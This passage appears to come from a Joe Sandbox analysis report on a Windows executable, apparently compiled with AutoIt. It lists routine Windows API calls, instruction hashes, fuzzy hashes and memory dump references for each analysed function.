                                                                            • Opcode Fuzzy Hash: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                            • Instruction Fuzzy Hash: AE31AD32A08B4292F774EB26E450B79AB61FB49BC4F840535DE4D07B48DF2CE0668B20
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF79786A27B,?,?,?,00007FF79786A236), ref: 00007FF797873DB1
                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF79786A27B,?,?,?,00007FF79786A236), ref: 00007FF797873E13
                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF79786A27B,?,?,?,00007FF79786A236), ref: 00007FF797873E4D
                                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF79786A27B,?,?,?,00007FF79786A236), ref: 00007FF797873E77
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                            • String ID:
                                                                            • API String ID: 1557788787-0
                                                                            • Opcode ID: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                            • Instruction ID: fe392bf9a348760942c3271443213331ca84cc80dcb129335f063ebec7286d91
                                                                            • Opcode Fuzzy Hash: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                            • Instruction Fuzzy Hash: 6D218622B1879181D630AF21A844429FAA5FF44FD0F884134DE8E67F94DF3CE5A38311
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID:
                                                                            • API String ID: 847901565-0
                                                                            • Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                            • Instruction ID: aa8a7b3af7de2816c5e8d5fa13b36840ef8acc33180aedf9769d9b1889983ea6
                                                                            • Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                            • Instruction Fuzzy Hash: CA219121A08B4295EA30AB399884B39BB51AF85BE4F954231D97D07BE4CF3CE452C310
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                            • String ID:
                                                                            • API String ID: 2864067406-0
                                                                            • Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                            • Instruction ID: 16992df8c84411d206a79e10d29b9cd7d79c2aa76d7b0b5f1ada203fb3ce7fd6
                                                                            • Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                            • Instruction Fuzzy Hash: 9D314026A08A4685EB20FB2AE4547BDEB60FB84FD4F944131DA4D47BA4CF3CD556C710
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                            • String ID: cdecl
                                                                            • API String ID: 4031866154-3896280584
                                                                            • Opcode ID: 6ee308fa608802624a00634d89d3b35e25db475d47eac5eefd8d872017a6409b
                                                                            • Instruction ID: 10fd8d1523d7efd69d50429587440edf9187bc88103bd70c5e0bd0a87fe3b919
                                                                            • Opcode Fuzzy Hash: 6ee308fa608802624a00634d89d3b35e25db475d47eac5eefd8d872017a6409b
                                                                            • Instruction Fuzzy Hash: 2221A12170834285EB24BF26A854678BBA1EF98FD0BC94134EB5E47794DF3DE4A2C314
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                            • String ID:
                                                                            • API String ID: 837644225-0
                                                                            • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                            • Instruction ID: 5241ec6bd398005c483cf3bb7f4236a1b27a335589308e90904bc1d6b5d5db4a
                                                                            • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                            • Instruction Fuzzy Hash: 41212432A08B4196EB20EF31D804B68BBA5FB84BD0F854439DA0D43744DF3DE962C320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                            • String ID:
                                                                            • API String ID: 3970641297-0
                                                                            • Opcode ID: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                            • Instruction ID: e8f7d7400df746208a2dc7889134b51d54d5707e92f244fa8feb62c995ffa4b9
                                                                            • Opcode Fuzzy Hash: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                            • Instruction Fuzzy Hash: 3721417260C7C58AE7749B29E844BAABBA0FB88B84F840135DA8D43B54DF7CD495CB00
                                                                            APIs
                                                                              • Part of subcall function 00007FF797832A54: GetWindowLongPtrW.USER32 ref: 00007FF797832A71
                                                                            • GetClientRect.USER32(?,?,?,?,?,00007FF79787AA36,?,?,?,?,?,?,?,?,?,00007FF7978327AF), ref: 00007FF7978E22C4
                                                                            • GetCursorPos.USER32(?,?,?,?,?,00007FF79787AA36,?,?,?,?,?,?,?,?,?,00007FF7978327AF), ref: 00007FF7978E22CF
                                                                            • ScreenToClient.USER32 ref: 00007FF7978E22DD
                                                                            • DefDlgProcW.USER32(?,?,?,?,?,00007FF79787AA36,?,?,?,?,?,?,?,?,?,00007FF7978327AF), ref: 00007FF7978E231F
                                                                              • Part of subcall function 00007FF7978DE894: LoadCursorW.USER32 ref: 00007FF7978DE945
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1626762757-0
                                                                            • Opcode ID: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                            • Instruction ID: e5d7c52c453263b339a83c5c973d634779f8cd4b2d73d0fe5ea2eb2ccfd1c327
                                                                            • Opcode Fuzzy Hash: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                            • Instruction Fuzzy Hash: 80213231A08A4686EA34FB25E480969B761FB85FD4F940131DB4D47B55CF3CE952CB10
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _ctrlfp
                                                                            • String ID:
                                                                            • API String ID: 697997973-0
                                                                            • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                            • Instruction ID: a3456008b86ca76c96cc62ae3bdf9751e84a0ecab48f70da3cacfc09871e450d
                                                                            • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                            • Instruction Fuzzy Hash: 87110B21D0CD4692E221FB38904157BE771FF9B7D0FA48230FB8906A95DE2DD4528B00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2979156933-0
                                                                            • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                            • Instruction ID: 1f60ec058fa0959c06dacf06c5f20b38a562493213ee97f2b4b4bea988f9e6a7
                                                                            • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                            • Instruction Fuzzy Hash: 9121D832A0C78286E720EF36B84056AFB91FB84BE4F848135E99D43B69DF7CD1168750
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                            • String ID:
                                                                            • API String ID: 357397906-0
                                                                            • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                            • Instruction ID: 0b9a9eb25e1f4e3c6092221bc892f2b9006b26f5e906f7833ad58dc469e86cf4
                                                                            • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                            • Instruction Fuzzy Hash: A12108B6B04B45DFEB00DF74D8845AC7BB1F748B88B404826EA5893B18DB78D665CB50
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$abort
                                                                            • String ID:
                                                                            • API String ID: 1447195878-0
                                                                            • Opcode ID: 5c68b7f432a971f9c1a5a37c5612d4f4cb9c7d627adb850da760d9ecfffa7c81
                                                                            • Instruction ID: b39e3803156502617dba1094690c2b269aa363771f14693a7036913056bfdcf5
                                                                            • Opcode Fuzzy Hash: 5c68b7f432a971f9c1a5a37c5612d4f4cb9c7d627adb850da760d9ecfffa7c81
                                                                            • Instruction Fuzzy Hash: 8501C410B09E4652FE78B7759505D389E599F447D8FE48438D90E067D6FE2CB8234230
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            • Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                            • Instruction ID: 0fbd73afe305b76ca2e7a3c4a966d81801de5f66eff35b01fb74d34bfd513a2f
                                                                            • Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                            • Instruction Fuzzy Hash: F401F520A0CF8682EE3A7B35944097BF760BF99781F850336E95F61560CF2CE5A78610
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                            • String ID:
                                                                            • API String ID: 1539411459-0
                                                                            • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                            • Instruction ID: 637c14a182b3432ffb06dfed2d1756de86ab1220bd64cd1c7b2605cf4500692e
                                                                            • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                            • Instruction Fuzzy Hash: 4F019235A2869142E7207B29BC09B29AF60BF81BD4F980134DE5903BA1CF7DD4528B10
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3974789173-0
                                                                            • Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                            • Instruction ID: 69156da9eaa4b706872e3c94928d2d18900ba5911e9fa59a9d1c9119760c1652
                                                                            • Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                            • Instruction Fuzzy Hash: E6F06562A19502C2FB60BF71EC04B6877A0BF58FC5FC84034C90E82650EF7C99AAC320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                            • Instruction ID: 10a82a6c9b13856367d914974c8211e79b4c6e18855422887272ee3549c4cd9f
                                                                            • Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                            • Instruction Fuzzy Hash: 5DE01A20E0930286FA20BB72AC1CA38AA64AF48FD1F804434CD0E07B55DF7CA0568320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                            • Instruction ID: 50091527acaf1dac54a0ddf5ace0d41c8b2e90a1cef734027a60f268c3ff9a9e
                                                                            • Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                            • Instruction Fuzzy Hash: 4CE0BF60F0975286EA24FB71AC5CA38AA55AF49FD1F804434CD0E17B55DF7DA0568720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ContainedObject
                                                                            • String ID: AutoIt3GUI$Container
                                                                            • API String ID: 3565006973-3941886329
                                                                            • Opcode ID: e1481fd2a8d0416b882597c007a0e4bba38b356b2fac937ea6ae7002b112dc91
                                                                            • Instruction ID: 4fdb5d92c3220b1895a09038be489c368dc4acd6e15057178bb786605fdd3a19
                                                                            • Opcode Fuzzy Hash: e1481fd2a8d0416b882597c007a0e4bba38b356b2fac937ea6ae7002b112dc91
                                                                            • Instruction Fuzzy Hash: 42912776604B8286DB24EF29E4406ADB7B4FB88B94F918036DF8D43764EF79D856C310
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID: e+000$gfff
                                                                            • API String ID: 3215553584-3030954782
                                                                            • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                            • Instruction ID: 285eebacc8707a921e20bf4c91a50e0c5b4e0454809ba00be92207aa26f276b9
                                                                            • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                            • Instruction Fuzzy Hash: C7512762B18BC156EB359B359940B69EE92FB81BD0F88D231C69847BD5DE2CE052C720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleName_invalid_parameter_noinfo
